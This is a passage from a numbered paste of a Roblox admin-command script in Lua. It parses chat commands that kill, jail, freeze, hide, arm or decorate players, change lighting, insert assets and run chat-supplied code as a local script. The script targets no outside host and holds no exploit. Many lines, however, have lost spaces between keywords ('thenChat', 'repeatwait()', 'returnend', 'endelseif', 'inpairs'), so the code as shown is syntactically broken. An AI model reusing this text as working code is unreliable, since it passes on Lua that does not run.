  438. local cl = script.LocalScriptBase:Clone() cl.Code.Value = msg:sub(4)
  439. table.insert(objects, cl) cl.Parent = plr.PlayerGui cl.Disabled = false Output(msg:sub(4), plr)
  440. end
  441. end))
  442. end
  443.  
  444. if msg:lower():sub(1,4) == "ins " then
  445. coroutine.resume(coroutine.create(function()
  446. local obj = game:service("InsertService"):LoadAsset(tonumber(msg:sub(5)))
  447. if obj and #obj:children() >= 1 and plr.Character then
  448. table.insert(objects, obj) for i,v in pairs(obj:children()) do table.insert(objects, v) end obj.Parent =game.Workspace obj:MakeJoints() obj:MoveTo(plr.Character:GetModelCFrame().p)
  449. end
  450. end))
  451. end
  452.  
  453. if msg:lower() == "clr" or msg:lower() == "clear" or msg:lower() == "clearscripts" then
  454. for i, v in pairs(objects) do if v:IsA("Script") or v:IsA("LocalScript") then v.Disabled = true end v:Destroy()end
  455. objects = {}
  456. end
  457.  
  458. if msg:lower() == "fix" or msg:lower() == "undisco" or msg:lower() == "unflash" then
  459. game.Lighting.Ambient = origsettings.abt
  460. game.Lighting.Brightness = origsettings.brt
  461. game.Lighting.TimeOfDay = origsettings.time
  462. game.Lighting.FogColor = origsettings.fclr
  463. game.Lighting.FogEnd = origsettings.fe
  464. game.Lighting.FogStart = origsettings.fs
  465. for i, v in pairs(lobjs) do v:Destroy() end
  466. for i, v in pairs(game.Workspace:children()) do if v.Name == "LightEdit" then v:Destroy() end end
  467. end
  468.  
  469. if msg:lower() == "cmdbar" or msg:lower() == "cmdgui" then
  470. coroutine.resume(coroutine.create(function()
  471. for i,v in pairs(plr.PlayerGui:children()) do if v.Name == "CMDBAR" then v:Destroy() end end
  472. local scr = Instance.new("ScreenGui", plr.PlayerGui) scr.Name = "CMDBAR"
  473. local box = Instance.new("TextBox", scr) box.BackgroundColor3 = Color3.new(0,0,0) box.TextColor3 =Color3.new(1,1,1) box.Font = "Arial" box.FontSize = "Size14" box.Text = "Type a command, then press enter."box.Size = UDim2.new(0,250,0,20) box.Position = UDim2.new(1,-250,1,-22) box.BorderSizePixel = 0 box.TextXAlignment= "Right" box.ZIndex = 10 box.ClipsDescendants = true
  474. box.Changed:connect(function(p) if p == "Text" and box.Text ~= "Type a command, then press enter." thenChat(box.Text, plr) box.Text = "Type a command, then press enter." end end)
  475. end))
  476. end
  477.  
  478. if msg:lower():sub(1,2) == "m " then
  479. Message("Message from " .. plr.Name, msg:sub(3), true, game.Players:children())
  480. end
  481.  
  482. if msg:lower():sub(1,2) == "h " then
  483. Hint(plr.Name .. ": " .. msg:sub(3), game.Players:children())
  484. end
  485.  
  486. if msg:lower():sub(1,3) == "pm " then
  487. local chk1 = msg:lower():sub(4):find(" ") + 3
  488. local plrz = GetPlr(plr, msg:lower():sub(4,chk1-1))
  489. Message("Private Message from " .. plr.Name, msg:sub(chk1+1), true, plrz)
  490. end
  491.  
  492. if msg:lower():sub(1,11) == "resetstats " then
  493. local plrz = GetPlr(plr, msg:lower():sub(12))
  494. for i, v in pairs(plrz) do
  495. coroutine.resume(coroutine.create(function()
  496. if v and v:findFirstChild("leaderstats") then
  497. for a, q in pairs(v.leaderstats:children()) do
  498. if q:IsA("IntValue") then q.Value = 0 end
  499. end
  500. end
  501. end))
  502. end
  503. end
  504.  
  505. if msg:lower():sub(1,5) == "gear " then
  506. local chk1 = msg:lower():sub(6):find(" ") + 5
  507. local plrz = GetPlr(plr, msg:lower():sub(6, chk1-1))
  508. for i, v in pairs(plrz) do
  509. coroutine.resume(coroutine.create(function()
  510. if v and v.Character then
  511. local obj = game:service("InsertService"):LoadAsset(tonumber(msg:sub(chk1+1)))
  512. for a,g in pairs(obj:children()) do if g:IsA("Tool") or g:IsA("HopperBin") then g.Parent = v.Character end end
  513. obj:Destroy()
  514. end
  515. end))
  516. end
  517. end
  518.  
  519. if msg:lower():sub(1,4) == "hat " then
  520. local chk1 = msg:lower():sub(5):find(" ") + 4
  521. local plrz = GetPlr(plr, msg:lower():sub(5, chk1-1))
  522. for i, v in pairs(plrz) do
  523. coroutine.resume(coroutine.create(function()
  524. if v and v.Character then
  525. local obj = game:service("InsertService"):LoadAsset(tonumber(msg:sub(chk1+1)))
  526. for a,hat in pairs(obj:children()) do if hat:IsA("Hat") then hat.Parent = v.Character end end
  527. obj:Destroy()
  528. end
  529. end))
  530. end
  531. end
  532.  
  533. if msg:lower():sub(1,5) == "cape " then
  534. local chk1 = msg:lower():sub(6):find(" ")
  535. local plrz = GetPlr(plr, msg:lower():sub(6))
  536. local str = "torso.BrickColor"
  537. if chk1 then chk1 = chk1 + 5 plrz = GetPlr(plr, msg:lower():sub(6,chk1-1))
  538. local teststr = [[BrickColor.new("]]..msg:sub(chk1+1,chk1+1):upper()..msg:sub(chk1+2):lower()..[[")]]
  539. if msg:sub(chk1+1):lower() == "new yeller" then teststr = [[BrickColor.new("New Yeller")]] end
  540. if msg:sub(chk1+1):lower() == "pastel blue" then teststr = [[BrickColor.new("Pastel Blue")]] end
  541. if msg:sub(chk1+1):lower() == "dusty rose" then teststr = [[BrickColor.new("Dusty Rose")]] end
  542. if msg:sub(chk1+1):lower() == "cga brown" then teststr = [[BrickColor.new("CGA brown")]] end
  543. if msg:sub(chk1+1):lower() == "random" then teststr = [[BrickColor.random()]] end
  544. if msg:sub(chk1+1):lower() == "shiny" then teststr = [[BrickColor.new("Institutional white") p.Reflectance = 1]]end
  545. if msg:sub(chk1+1):lower() == "gold" then teststr = [[BrickColor.new("Bright yellow") p.Reflectance = .4]] end
  546. if msg:sub(chk1+1):lower() == "kohl" then teststr = [[BrickColor.new("Really black") local dec = Instance.new("Decal", p) dec.Face = 2 dec.Texture = "http://www.roblox.com/asset/?id=108597653"]] end
  547. if msg:sub(chk1+1):lower() == "batman" then teststr = [[BrickColor.new("Really black") local dec = Instance.new("Decal", p) dec.Face = 2 dec.Texture = "http://www.roblox.com/asset/?id=108597669"]] end
  548. if msg:sub(chk1+1):lower() == "superman" then teststr = [[BrickColor.new("Bright blue") local dec = Instance.new("Decal", p) dec.Face = 2 dec.Texture = "http://www.roblox.com/asset/?id=108597677"]] end
  549. if msg:sub(chk1+1):lower() == "swag" then teststr = [[BrickColor.new("Pink") local dec = Instance.new("Decal", p) dec.Face = 2 dec.Texture = "http://www.roblox.com/asset/?id=109301474"]] end
  550. if BrickColor.new(teststr) ~= nil then str = teststr end
  551. end
  552. for i, v in pairs(plrz) do
  553. coroutine.resume(coroutine.create(function()
  554. if v and v:findFirstChild("PlayerGui") and v.Character and v.Character:findFirstChild("Torso") then
  555. for a,cp in pairs(v.Character:children()) do if cp.Name == "EpicCape" then cp:Destroy() end end
  556. local cl = script.LocalScriptBase:Clone() cl.Name = "CapeScript" cl.Code.Value = [[local plr = game.Players.LocalPlayer
  557. repeat wait() until plr and plr.Character and plr.Character:findFirstChild("Torso")
  558. local torso = plr.Character.Torso
  559. local p = Instance.new("Part", torso.Parent) p.Name = "EpicCape" p.Anchored = false
  560. p.CanCollide = false p.TopSurface = 0 p.BottomSurface = 0 p.BrickColor = ]]..str..[[ p.formFactor = "Custom"
  561. p.Size = Vector3.new(.2,.2,.2)
  562. local msh = Instance.new("BlockMesh", p) msh.Scale = Vector3.new(9,17.5,.5)
  563. local motor1 = Instance.new("Motor", p)
  564. motor1.Part0 = p
  565. motor1.Part1 = torso
  566. motor1.MaxVelocity = .01
  567. motor1.C0 = CFrame.new(0,1.75,0)*CFrame.Angles(0,math.rad(90),0)
  568. motor1.C1 = CFrame.new(0,1,.45)*CFrame.Angles(0,math.rad(90),0)
  569. local wave = false
  570. repeat wait(1/44)
  571. local ang = 0.1
  572. local oldmag = torso.Velocity.magnitude
  573. local mv = .002
  574. if wave then ang = ang + ((torso.Velocity.magnitude/10)*.05)+.05 wave = false else wave = true end
  575. ang = ang + math.min(torso.Velocity.magnitude/11, .5)
  576. motor1.MaxVelocity = math.min((torso.Velocity.magnitude/111), .04) + mv
  577. motor1.DesiredAngle = -ang
  578. if motor1.CurrentAngle < -.2 and motor1.DesiredAngle > -.2 then motor1.MaxVelocity = .04 end
  579. repeat wait() until motor1.CurrentAngle == motor1.DesiredAngle or math.abs(torso.Velocity.magnitude - oldmag) >= (torso.Velocity.magnitude/10) + 1
  580. if torso.Velocity.magnitude < .1 then wait(.1) end
  581. until not p or p.Parent ~= torso.Parent
  582. script:Destroy()
  583. ]] cl.Parent = v.PlayerGui cl.Disabled = false
  584. end
  585. end))
  586. end
  587. end
  588.  
  589. if msg:lower():sub(1,7) == "uncape " then
  590. local plrz = GetPlr(plr, msg:lower():sub(8))
  591. for i, v in pairs(plrz) do
  592. coroutine.resume(coroutine.create(function()
  593. if v and v:findFirstChild("PlayerGui") and v.Character then
  594. for a,cp in pairs(v.Character:children()) do if cp.Name == "EpicCape" then cp:Destroy() end end
  595. end
  596. end))
  597. end
  598. end
  599.  
  600. if msg:lower():sub(1,7) == "noclip " then
  601. local plrz = GetPlr(plr, msg:lower():sub(8))
  602. for i, v in pairs(plrz) do
  603. coroutine.resume(coroutine.create(function()
  604. if v and v:findFirstChild("PlayerGui") then
  605. local cl = script.LocalScriptBase:Clone() cl.Name = "NoClip" cl.Code.Value = [[repeat wait(1/44) until game.Players.LocalPlayer and game.Players.LocalPlayer.Character and game.Players.LocalPlayer.Character:findFirstChild("Humanoid") and game.Players.LocalPlayer.Character:findFirstChild("Torso") and game.Players.LocalPlayer:GetMouse() and game.Workspace.CurrentCamera local mouse = game.Players.LocalPlayer:GetMouse() local torso = game.Players.LocalPlayer.Character.Torso local dir = {w = 0, s = 0, a = 0, d = 0} local spd = 2 mouse.KeyDown:connect(function(key) if key:lower() == "w" then dir.w = 1 elseif key:lower() == "s" then dir.s = 1 elseif key:lower() == "a" then dir.a = 1 elseif key:lower() == "d" then dir.d = 1 elseif key:lower() == "q" then spd = spd + 1 elseif key:lower() == "e" then spd = spd - 1 end end) mouse.KeyUp:connect(function(key) if key:lower() == "w" then dir.w = 0 elseif key:lower() == "s" then dir.s = 0 elseif key:lower() == "a" then dir.a = 0 elseif key:lower() == "d" then dir.d = 0 end end) torso.Anchored = true game.Players.LocalPlayer.Character.Humanoid.PlatformStand = true game.Players.LocalPlayer.Character.Humanoid.Changed:connect(function() game.Players.LocalPlayer.Character.Humanoid.PlatformStand = true end) repeat wait(1/44) torso.CFrame = CFrame.new(torso.Position, game.Workspace.CurrentCamera.CoordinateFrame.p) * CFrame.Angles(0,math.rad(180),0) * CFrame.new((dir.d-dir.a)*spd,0,(dir.s-dir.w)*spd) until nil]]
  606. cl.Parent = v.PlayerGui cl.Disabled = false
  607. end
  608. end))
  609. end
  610. end
  611.  
  612. if msg:lower():sub(1,5) == "clip " then
  613. local plrz = GetPlr(plr, msg:lower():sub(6))
  614. for i, v in pairs(plrz) do
  615. coroutine.resume(coroutine.create(function()
  616. if v and v:findFirstChild("PlayerGui") and v.Character and v.Character:findFirstChild("Torso") andv.Character:findFirstChild("Humanoid") then
  617. for a, q in pairs(v.PlayerGui:children()) do if q.Name == "NoClip" then q:Destroy() end end
  618. v.Character.Torso.Anchored = false
  619. wait(.1) v.Character.Humanoid.PlatformStand = false
  620. end
  621. end))
  622. end
  623. end
  624.  
  625. if msg:lower():sub(1,5) == "jail " then
  626. local plrz = GetPlr(plr, msg:lower():sub(6))
  627. for i, v in pairs(plrz) do
  628. coroutine.resume(coroutine.create(function()
  629. if v and v.Character and v.Character:findFirstChild("Torso") then
  630. local vname = v.Name
  631. local cf = v.Character.Torso.CFrame + Vector3.new(0,1,0)
  632. local mod = Instance.new("Model", game.Workspace) table.insert(objects, mod) mod.Name = v.Name .. " Jail"
  633. local top = Instance.new("Part", mod) top.Locked = true top.formFactor = "Symmetric" top.Size = Vector3.new(6,1,6)top.TopSurface = 0 top.BottomSurface = 0 top.Anchored = true top.BrickColor = BrickColor.new("Really black")top.CFrame = cf * CFrame.new(0,-3.5,0)
  634. v.CharacterAdded:connect(function() if not mod or (mod and mod.Parent ~= game.Workspace) then return end repeatwait() until v and v.Character and v.Character:findFirstChild("Torso") v.Character.Torso.CFrame = cf end)
  635. v.Changed:connect(function(p) if p ~= "Character" or not mod or (mod and mod.Parent ~= game.Workspace) then returnend repeat wait() until v and v.Character and v.Character:findFirstChild("Torso") v.Character.Torso.CFrame = cfend)
  636. game.Players.PlayerAdded:connect(function(plr) if plr.Name == vname then v = plr end
  637. v.CharacterAdded:connect(function() if not mod or (mod and mod.Parent ~= game.Workspace) then return end repeatwait() until v and v.Character and v.Character:findFirstChild("Torso") v.Character.Torso.CFrame = cf end)
  638. v.Changed:connect(function(p) if p ~= "Character" or not mod or (mod and mod.Parent ~= game.Workspace) then returnend repeat wait() until v and v.Character and v.Character:findFirstChild("Torso") v.Character.Torso.CFrame = cfend)
  639. end)
  640. local bottom = top:Clone() bottom.Parent = mod bottom.CFrame = cf * CFrame.new(0,3.5,0)
  641. local front = top:Clone() front.Transparency = .5 front.Reflectance = .1 front.Parent = mod front.Size =Vector3.new(6,6,1) front.CFrame = cf * CFrame.new(0,0,-3)
  642. local back = front:Clone() back.Parent = mod back.CFrame = cf * CFrame.new(0,0,3)
  643. local right = front:Clone() right.Parent = mod right.Size = Vector3.new(1,6,6) right.CFrame = cf *CFrame.new(3,0,0)
  644. local left = right:Clone() left.Parent = mod left.CFrame = cf * CFrame.new(-3,0,0)
  645. local msh = Instance.new("BlockMesh", front) msh.Scale = Vector3.new(1,1,0)
  646. local msh2 = msh:Clone() msh2.Parent = back
  647. local msh3 = msh:Clone() msh3.Parent = right msh3.Scale = Vector3.new(0,1,1)
  648. local msh4 = msh3:Clone() msh4.Parent = left
  649. v.Character.Torso.CFrame = cf
  650. end
  651. end))
  652. end
  653. end
  654.  
  655. if msg:lower():sub(1,7) == "unjail " then
  656. local plrz = GetPlr(plr, msg:lower():sub(8))
  657. for i, v in pairs(plrz) do coroutine.resume(coroutine.create(function() if v then for a, jl inpairs(game.Workspace:children()) do if jl.Name == v.Name .. " Jail" then jl:Destroy() end end end end)) end
  658. end
  659.  
  660. if msg:lower():sub(1,11) == "starttools " then
  661. local plrz = GetPlr(plr, msg:lower():sub(12))
  662. for i, v in pairs(plrz) do
  663. coroutine.resume(coroutine.create(function()
  664. if v and v:findFirstChild("Backpack") then
  665. for a,q in pairs(game.StarterPack:children()) do q:Clone().Parent = v.Backpack end
  666. end
  667. end))
  668. end
  669. end
  670.  
  671. if msg:lower():sub(1,6) == "sword " then
  672. local plrz = GetPlr(plr, msg:lower():sub(7))
  673. for i, v in pairs(plrz) do
  674. coroutine.resume(coroutine.create(function()
  675. if v and v:findFirstChild("Backpack") then
  676. local sword = Instance.new("Tool", v.Backpack) sword.Name = "Sword" sword.TextureId ="rbxasset://Textures/Sword128.png"
  677. sword.GripForward = Vector3.new(-1,0,0)
  678. sword.GripPos = Vector3.new(0,0,-1.5)
  679. sword.GripRight = Vector3.new(0,1,0)
  680. sword.GripUp = Vector3.new(0,0,1)
  681. local handle = Instance.new("Part", sword) handle.Name = "Handle" handle.FormFactor = "Plate" handle.Size =Vector3.new(1,.8,4) handle.TopSurface = 0 handle.BottomSurface = 0
  682. local msh = Instance.new("SpecialMesh", handle) msh.MeshId = "rbxasset://fonts/sword.mesh" msh.TextureId ="rbxasset://textures/SwordTexture.png"
  683. local cl = script.LocalScriptBase:Clone() cl.Parent = sword cl.Code.Value = [[
  684. repeat wait() until game.Players.LocalPlayer and game.Players.LocalPlayer.Character and game.Players.LocalPlayer.Character:findFirstChild("Humanoid")
  685. local Damage = 15
  686. local SlashSound = Instance.new("Sound", script.Parent.Handle)
  687. SlashSound.SoundId = "rbxasset://sounds\\swordslash.wav"
  688. SlashSound.Volume = 1
  689. local LungeSound = Instance.new("Sound", script.Parent.Handle)
  690. LungeSound.SoundId = "rbxasset://sounds\\swordlunge.wav"
  691. LungeSound.Volume = 1
  692. local UnsheathSound = Instance.new("Sound", script.Parent.Handle)
  693. UnsheathSound.SoundId = "rbxasset://sounds\\unsheath.wav"
  694. UnsheathSound.Volume = 1
  695. local last = 0
  696. script.Parent.Handle.Touched:connect(function(hit)
  697. if hit and hit.Parent and hit.Parent:findFirstChild("Humanoid") and game.Players:findFirstChild(hit.Parent.Name) and game.Players.LocalPlayer.Character.Humanoid.Health > 0 and hit.Parent.Humanoid ~= game.Players.LocalPlayer.Character.Humanoid then
  698. local tag = Instance.new("ObjectValue", hit.Parent.Humanoid) tag.Value = plr1 tag.Name = "creator" game:service("Debris"):AddItem(tag, 3)
  699. hit.Parent.Humanoid:TakeDamage(Damage)
  700. end
  701. end)
  702. script.Parent.Activated:connect(function()
  703. if not script.Parent.Enabled or game.Players.LocalPlayer.Character.Humanoid.Health <= 0 then return end
  704. script.Parent.Enabled = false
  705. local tick = game:service("RunService").Stepped:wait()
  706. if tick - last <= .2 then
  707. LungeSound:play()
  708. local lunge = Instance.new("StringValue", script.Parent) lunge.Name = "toolanim" lunge.Value = "Lunge"
  709. local frc = Instance.new("BodyVelocity", game.Players.LocalPlayer.Character.Torso) frc.Name = "SwordForce" frc.velocity = Vector3.new(0,10,0)
  710. wait(.2)
  711. script.Parent.GripForward = Vector3.new(0,0,1)
  712. script.Parent.GripRight = Vector3.new(0,-1,0)
  713. script.Parent.GripUp = Vector3.new(-1,0,0)
  714. wait(.3)
  715. frc:Destroy() wait(.5)
  716. script.Parent.GripForward = Vector3.new(-1,0,0)
  717. script.Parent.GripRight = Vector3.new(0,1,0)
  718. script.Parent.GripUp = Vector3.new(0,0,1)
  719. else
  720. SlashSound:play()
  721. local slash = Instance.new("StringValue", script.Parent) slash.Name = "toolanim" slash.Value = "Slash"
  722. end
  723. last = tick
  724. script.Parent.Enabled = true
  725. end)
  726. script.Parent.Equipped:connect(function(mouse)
  727. for i,v in pairs(game.Players.LocalPlayer.Character.Torso:children()) do if v.Name == "SwordForce" then v:Destroy() end end
  728. UnsheathSound:play()
  729. script.Parent.Enabled = true
  730. if not mouse then return end
  731. mouse.Icon = "http://www.roblox.com/asset/?id=103593352"
  732. end)]] cl.Disabled = false
  733. end
  734. end))
  735. end
  736. end
  737.  
  738. if msg:lower():sub(1,5) == "kill " then
  739. local plrz = GetPlr(plr, msg:lower():sub(6))
  740. for i, v in pairs(plrz) do
  741. coroutine.resume(coroutine.create(function()
  742. if v and v.Character then v.Character:BreakJoints() end
  743. end))
  744. end
  745. end
  746.  
  747. if msg:lower():sub(1,8) == "respawn " then
  748. local plrz = GetPlr(plr, msg:lower():sub(9))
  749. for i, v in pairs(plrz) do
  750. coroutine.resume(coroutine.create(function()
  751. if v and v.Character then v:LoadCharacter() end
  752. end))
  753. end
  754. end
  755.  
  756. if msg:lower():sub(1,5) == "trip " then
  757. local plrz = GetPlr(plr, msg:lower():sub(6))
  758. for i, v in pairs(plrz) do
  759. coroutine.resume(coroutine.create(function()
  760. if v and v.Character and v.Character:findFirstChild("Torso") then
  761. v.Character.Torso.CFrame = v.Character.Torso.CFrame * CFrame.Angles(0,0,math.rad(180))
  762. end
  763. end))
  764. end
  765. end
  766.  
  767. if msg:lower():sub(1,5) == "stun " then
  768. local plrz = GetPlr(plr, msg:lower():sub(6))
  769. for i, v in pairs(plrz) do
  770. coroutine.resume(coroutine.create(function()
  771. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  772. v.Character.Humanoid.PlatformStand = true
  773. end
  774. end))
  775. end
  776. end
  777.  
  778. if msg:lower():sub(1,7) == "unstun " then
  779. local plrz = GetPlr(plr, msg:lower():sub(8))
  780. for i, v in pairs(plrz) do
  781. coroutine.resume(coroutine.create(function()
  782. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  783. v.Character.Humanoid.PlatformStand = false
  784. end
  785. end))
  786. end
  787. end
  788.  
  789. if msg:lower():sub(1,5) == "jump " then
  790. local plrz = GetPlr(plr, msg:lower():sub(6))
  791. for i, v in pairs(plrz) do
  792. coroutine.resume(coroutine.create(function()
  793. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  794. v.Character.Humanoid.Jump = true
  795. end
  796. end))
  797. end
  798. end
  799.  
  800. if msg:lower():sub(1,4) == "sit " then
  801. local plrz = GetPlr(plr, msg:lower():sub(5))
  802. for i, v in pairs(plrz) do
  803. coroutine.resume(coroutine.create(function()
  804. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  805. v.Character.Humanoid.Sit = true
  806. end
  807. end))
  808. end
  809. end
  810.  
  811. if msg:lower():sub(1,10) == "invisible " then
  812. local plrz = GetPlr(plr, msg:lower():sub(11))
  813. for i, v in pairs(plrz) do
  814. coroutine.resume(coroutine.create(function()
  815. if v and v.Character then
  816. for a, obj in pairs(v.Character:children()) do
  817. if obj:IsA("BasePart") then obj.Transparency = 1 if obj:findFirstChild("face") then obj.face.Transparency = 1 endelseif obj:IsA("Hat") and obj:findFirstChild("Handle") then obj.Handle.Transparency = 1 end
  818. end
  819. end
  820. end))
  821. end
  822. end
  823.  
  824. if msg:lower():sub(1,8) == "visible " then
  825. local plrz = GetPlr(plr, msg:lower():sub(9))
  826. for i, v in pairs(plrz) do
  827. coroutine.resume(coroutine.create(function()
  828. if v and v.Character then
  829. for a, obj in pairs(v.Character:children()) do
  830. if obj:IsA("BasePart") then obj.Transparency = 0 if obj:findFirstChild("face") then obj.face.Transparency = 0 endelseif obj:IsA("Hat") and obj:findFirstChild("Handle") then obj.Handle.Transparency = 0 end
  831. end
  832. end
  833. end))
  834. end
  835. end
  836.  
  837. if msg:lower():sub(1,5) == "lock " then
  838. local plrz = GetPlr(plr, msg:lower():sub(6))
  839. for i, v in pairs(plrz) do
  840. coroutine.resume(coroutine.create(function()
  841. if v and v.Character then
  842. for a, obj in pairs(v.Character:children()) do
  843. if obj:IsA("BasePart") then obj.Locked = true elseif obj:IsA("Hat") and obj:findFirstChild("Handle") thenobj.Handle.Locked = true end
  844. end
  845. end
  846. end))
  847. end
  848. end
  849.  
  850. if msg:lower():sub(1,7) == "unlock " then
  851. local plrz = GetPlr(plr, msg:lower():sub(8))
  852. for i, v in pairs(plrz) do
  853. coroutine.resume(coroutine.create(function()
  854. if v and v.Character then
  855. for a, obj in pairs(v.Character:children()) do
  856. if obj:IsA("BasePart") then obj.Locked = false elseif obj:IsA("Hat") and obj:findFirstChild("Handle") thenobj.Handle.Locked = false end
  857. end
  858. end
  859. end))
  860. end
  861. end
  862.  
  863. if msg:lower():sub(1,8) == "explode " then
  864. local plrz = GetPlr(plr, msg:lower():sub(9))
  865. for i, v in pairs(plrz) do
  866. coroutine.resume(coroutine.create(function()
  867. if v and v.Character and v.Character:findFirstChild("Torso") then
  868. local ex = Instance.new("Explosion", game.Workspace) ex.Position = v.Character.Torso.Position
  869. end
  870. end))
  871. end
  872. end
  873.  
  874. if msg:lower():sub(1,4) == "age " then
  875. local plrz = GetPlr(plr, msg:lower():sub(5))
  876. for i, v in pairs(plrz) do
  877. coroutine.resume(coroutine.create(function()
  878. if v then Message(v.Name .. "'s age", tostring(v.AccountAge), false, {plr}) end
  879. end))
  880. end
  881. end
  882.  
  883. if msg:lower():sub(1,5) == "fire " then
  884. local plrz = GetPlr(plr, msg:lower():sub(6))
  885. for i, v in pairs(plrz) do
  886. coroutine.resume(coroutine.create(function()
  887. if v and v.Character and v.Character:findFirstChild("Torso") then
  888. local cl = Instance.new("Fire", v.Character.Torso) table.insert(objects, cl)
  889. end
  890. end))
  891. end
  892. end
  893.  
  894. if msg:lower():sub(1,7) == "unfire " then
  895. local plrz = GetPlr(plr, msg:lower():sub(8))
  896. for i, v in pairs(plrz) do
  897. coroutine.resume(coroutine.create(function()
  898. if v and v.Character and v.Character:findFirstChild("Torso") then
  899. for z, cl in pairs(v.Character.Torso:children()) do if cl:IsA("Fire") then cl:Destroy() end end
  900. end
  901. end))
  902. end
  903. end
  904.  
  905. if msg:lower():sub(1,6) == "smoke " then
  906. local plrz = GetPlr(plr, msg:lower():sub(7))
  907. for i, v in pairs(plrz) do
  908. coroutine.resume(coroutine.create(function()
  909. if v and v.Character and v.Character:findFirstChild("Torso") then
  910. local cl = Instance.new("Smoke", v.Character.Torso) table.insert(objects, cl)
  911. end
  912. end))
  913. end
  914. end
  915.  
  916. if msg:lower():sub(1,8) == "unsmoke " then
  917. local plrz = GetPlr(plr, msg:lower():sub(9))
  918. for i, v in pairs(plrz) do
  919. coroutine.resume(coroutine.create(function()
  920. if v and v.Character and v.Character:findFirstChild("Torso") then
  921. for z, cl in pairs(v.Character.Torso:children()) do if cl:IsA("Smoke") then cl:Destroy() end end
  922. end
  923. end))
  924. end
  925. end
  926.  
  927. if msg:lower():sub(1,9) == "sparkles " then
  928. local plrz = GetPlr(plr, msg:lower():sub(10))
  929. for i, v in pairs(plrz) do
  930. coroutine.resume(coroutine.create(function()
  931. if v and v.Character and v.Character:findFirstChild("Torso") then
  932. local cl = Instance.new("Sparkles", v.Character.Torso) table.insert(objects, cl)
  933. end
  934. end))
  935. end
  936. end
  937.  
  938. if msg:lower():sub(1,11) == "unsparkles " then
  939. local plrz = GetPlr(plr, msg:lower():sub(12))
  940. for i, v in pairs(plrz) do
  941. coroutine.resume(coroutine.create(function()
  942. if v and v.Character and v.Character:findFirstChild("Torso") then
  943. for z, cl in pairs(v.Character.Torso:children()) do if cl:IsA("Sparkles") then cl:Destroy() end end
  944. end
  945. end))
  946. end
  947. end
  948.  
  949. if msg:lower():sub(1,3) == "ff " then
  950. local plrz = GetPlr(plr, msg:lower():sub(4))
  951. for i, v in pairs(plrz) do
  952. coroutine.resume(coroutine.create(function()
  953. if v and v.Character then Instance.new("ForceField", v.Character) end
  954. end))
  955. end
  956. end
  957.  
  958. if msg:lower():sub(1,5) == "unff " then
  959. local plrz = GetPlr(plr, msg:lower():sub(6))
  960. for i, v in pairs(plrz) do
  961. coroutine.resume(coroutine.create(function()
  962. if v and v.Character then
  963. for z, cl in pairs(v.Character:children()) do if cl:IsA("ForceField") then cl:Destroy() end end
  964. end
  965. end))
  966. end
  967. end
  968.  
  969. if msg:lower():sub(1,7) == "punish " then
  970. local plrz = GetPlr(plr, msg:lower():sub(8))
  971. for i, v in pairs(plrz) do
  972. coroutine.resume(coroutine.create(function()
  973. if v and v.Character then
  974. v.Character.Parent = game:service("Lighting")
  975. end
  976. end))
  977. end
  978. end
  979.  
  980. if msg:lower():sub(1,9) == "unpunish " then
  981. local plrz = GetPlr(plr, msg:lower():sub(10))
  982. for i, v in pairs(plrz) do
  983. coroutine.resume(coroutine.create(function()
  984. if v and v.Character then
  985. v.Character.Parent = game:service("Workspace")
  986. v.Character:MakeJoints()
  987. end
  988. end))
  989. end
  990. end
  991.  
  992. if msg:lower():sub(1,7) == "freeze " then
  993. local plrz = GetPlr(plr, msg:lower():sub(8))
  994. for i, v in pairs(plrz) do
  995. coroutine.resume(coroutine.create(function()
  996. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  997. for a, obj in pairs(v.Character:children()) do
  998. if obj:IsA("BasePart") then obj.Anchored = true end v.Character.Humanoid.WalkSpeed = 0
  999. end
  1000. end
  1001. end))
  1002. end
  1003. end
  1004.  
  1005. if msg:lower():sub(1,5) == "thaw " then
  1006. local plrz = GetPlr(plr, msg:lower():sub(6))
  1007. for i, v in pairs(plrz) do
  1008. coroutine.resume(coroutine.create(function()
  1009. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1010. for a, obj in pairs(v.Character:children()) do
  1011. if obj:IsA("BasePart") then obj.Anchored = false end v.Character.Humanoid.WalkSpeed = 16
  1012. end
  1013. end
  1014. end))
  1015. end
  1016. end
  1017.  
  1018. if msg:lower():sub(1,5) == "heal " then
  1019. local plrz = GetPlr(plr, msg:lower():sub(6))
  1020. for i, v in pairs(plrz) do
  1021. coroutine.resume(coroutine.create(function()
  1022. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1023. v.Character.Humanoid.Health = v.Character.Humanoid.MaxHealth
  1024. end
  1025. end))
  1026. end
  1027. end
  1028.  
  1029. if msg:lower():sub(1,4) == "god " then
  1030. local plrz = GetPlr(plr, msg:lower():sub(5))
  1031. for i, v in pairs(plrz) do
  1032. coroutine.resume(coroutine.create(function()
  1033. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1034. v.Character.Humanoid.MaxHealth = math.huge
  1035. v.Character.Humanoid.Health = 9e9
  1036. end
  1037. end))
  1038. end
  1039. end
  1040.  
  1041. if msg:lower():sub(1,6) == "ungod " then
  1042. local plrz = GetPlr(plr, msg:lower():sub(7))
  1043. for i, v in pairs(plrz) do
  1044. coroutine.resume(coroutine.create(function()
  1045. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1046. v.Character.Humanoid.MaxHealth = 100
  1047. v.Character.Humanoid.Health = v.Character.Humanoid.MaxHealth
  1048. end
  1049. end))
  1050. end
  1051. end
  1052.  
  1053. if msg:lower():sub(1,8) == "ambient " then
  1054. local chk1 = msg:lower():sub(9):find(" ") + 8
  1055. local chk2 = msg:sub(chk1+1):find(" ") + chk1
  1056. game.Lighting.Ambient = Color3.new(msg:sub(9,chk1-1),msg:sub(chk1+1,chk2-1),msg:sub(chk2+1))
  1057. end
  1058.  
  1059. if msg:lower():sub(1,11) == "brightness " then
  1060. game.Lighting.Brightness = msg:sub(12)
  1061. end
  1062.  
  1063. if msg:lower():sub(1,5) == "time " then
  1064. game.Lighting.TimeOfDay = msg:sub(6)
  1065. end
  1066.  
  1067. if msg:lower():sub(1,9) == "fogcolor " then
  1068. local chk1 = msg:lower():sub(10):find(" ") + 9
  1069. local chk2 = msg:sub(chk1+1):find(" ") + chk1
  1070. game.Lighting.FogColor = Color3.new(msg:sub(10,chk1-1),msg:sub(chk1+1,chk2-1),msg:sub(chk2+1))
  1071. end
  1072.  
  1073. if msg:lower():sub(1,7) == "fogend " then
